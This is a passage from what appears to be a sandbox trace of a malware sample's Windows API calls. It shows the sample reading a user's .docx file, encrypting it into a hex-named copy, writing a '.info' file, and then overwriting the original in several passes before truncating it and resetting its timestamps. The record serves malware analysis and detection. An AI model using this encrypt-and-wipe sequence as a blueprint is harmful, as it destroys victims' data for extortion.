lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", lpFilePart=0x0) returned 0x3c [0076.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.425] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\quhaji.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.425] GetFileType (hFile=0x36c) returned 0x1 [0076.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.425] GetFileType (hFile=0x36c) returned 0x1 [0076.425] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9", lpFilePart=0x0) returned 0x51 [0076.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.425] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\1cc44ee1de728950bb6e113b67c25bb9"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a4 [0076.425] GetFileType (hFile=0x3a4) returned 0x1 [0076.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.425] GetFileType (hFile=0x3a4) returned 0x1 [0076.425] ReadFile (in: hFile=0x36c, lpBuffer=0x2155350, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x2155350*, lpNumberOfBytesRead=0x1bf5d128*=0xe4af, lpOverlapped=0x0) returned 1 [0076.427] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2169368*, pdwDataLen=0x1bf5d180*=0xe4a0, dwBufLen=0xe4a0 | out: pbData=0x2169368*, pdwDataLen=0x1bf5d180*=0xe4a0) returned 1 [0076.427] WriteFile (in: hFile=0x3a4, lpBuffer=0x2169368*, nNumberOfBytesToWrite=0xe4a0, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x2169368*, lpNumberOfBytesWritten=0x1bf5d118*=0xe4a0, lpOverlapped=0x0) returned 1 [0076.428] ReadFile (in: hFile=0x36c, lpBuffer=0x2155350, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x2155350*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0076.429] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2177848*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x2177848*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.429] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2177898*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x2177898*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.429] WriteFile (in: hFile=0x3a4, lpBuffer=0x21778e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x21778e8*, lpNumberOfBytesWritten=0x1bf5d048*=0x10, lpOverlapped=0x0) returned 1 [0076.429] CloseHandle (hObject=0x3a4) returned 1 [0076.430] CloseHandle (hObject=0x36c) returned 1 [0076.430] CryptDestroyKey (hKey=0x1a626ec0) returned 1 [0076.430] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0076.430] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0076.430] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9", lpFilePart=0x0) returned 0x51 [0076.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0076.430] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\1cc44ee1de728950bb6e113b67c25bb9"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.430] GetFileType (hFile=0x36c) returned 0x1 [0076.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0076.430] GetFileType (hFile=0x36c) returned 0x1 [0076.431] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.432] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.433] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.434] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.435] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.435] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.435] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.435] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.435] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.435] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.435] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.436] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.436] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.436] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.436] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x4b0, lpOverlapped=0x0) returned 1 [0076.436] ReadFile (in: hFile=0x36c, lpBuffer=0x2178ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2178ff0*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0076.436] CloseHandle (hObject=0x36c) returned 1 [0076.438] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9.info", lpFilePart=0x0) returned 0x56 [0076.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0076.438] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\1cc44ee1de728950bb6e113b67c25bb9.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.438] GetFileType (hFile=0x36c) returned 0x1 [0076.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0076.438] GetFileType (hFile=0x36c) returned 0x1 [0076.438] WriteFile (in: hFile=0x36c, lpBuffer=0x21856b0*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5ceb8, lpOverlapped=0x0 | out: lpBuffer=0x21856b0*, lpNumberOfBytesWritten=0x1bf5ceb8*=0x77d, lpOverlapped=0x0) returned 1 [0076.439] CloseHandle (hObject=0x36c) returned 1 [0076.444] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", lpFilePart=0x0) returned 0x3c [0076.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0076.445] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\quhaji.docx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d2f880, ftCreationTime.dwHighDateTime=0x1d4ca8f, ftLastAccessTime.dwLowDateTime=0x10dea320, ftLastAccessTime.dwHighDateTime=0x1d4c5ac, ftLastWriteTime.dwLowDateTime=0x10dea320, ftLastWriteTime.dwHighDateTime=0x1d4c5ac, nFileSizeHigh=0x0, nFileSizeLow=0xe4af)) returned 1 [0076.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0076.445] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", lpFilePart=0x0) returned 0x3c [0076.445] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", dwFileAttributes=0x80) returned 1 [0076.445] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", lpFilePart=0x0) returned 0x3c [0076.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0076.445] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\quhaji.docx"), fInfoLevelId=0x0, lpFileInformation=0x218d2b8 | out: lpFileInformation=0x218d2b8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x60d2f880, ftCreationTime.dwHighDateTime=0x1d4ca8f, ftLastAccessTime.dwLowDateTime=0x10dea320, ftLastAccessTime.dwHighDateTime=0x1d4c5ac, ftLastWriteTime.dwLowDateTime=0x10dea320, ftLastWriteTime.dwHighDateTime=0x1d4c5ac, nFileSizeHigh=0x0, nFileSizeLow=0xe4af)) returned 1 [0076.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0076.445] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", lpFilePart=0x0) returned 0x3c [0076.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0076.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\quhaji.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.445] GetFileType (hFile=0x36c) returned 0x1 [0076.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0076.445] GetFileType (hFile=0x36c) returned 0x1 [0076.445] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.446] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.447] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.448] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.448] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.449] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.450] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.451] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.451] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.452] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.453] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.454] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.454] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.455] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.456] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.456] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x600, lpOverlapped=0x0) returned 1 [0076.456] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.457] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.458] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.459] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.459] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.460] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.461] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.462] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.462] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.463] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.464] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.465] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.465] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.466] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.467] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.467] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x600, lpOverlapped=0x0) returned 1 [0076.467] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.468] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.469] WriteFile (in: hFile=0x36c, lpBuffer=0x218d750*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x218d750*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.470] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.470] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.470] SetEndOfFile (hFile=0x36c) returned 1 [0076.472] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.472] CloseHandle (hObject=0x36c) returned 1 [0076.472] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", lpFilePart=0x0) returned 0x3c [0076.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\quhaji.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.472] GetFileType (hFile=0x36c) returned 0x1 [0076.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.472] GetFileType (hFile=0x36c) returned 0x1 [0076.472] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.472] CloseHandle (hObject=0x36c) returned 1 [0076.472] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 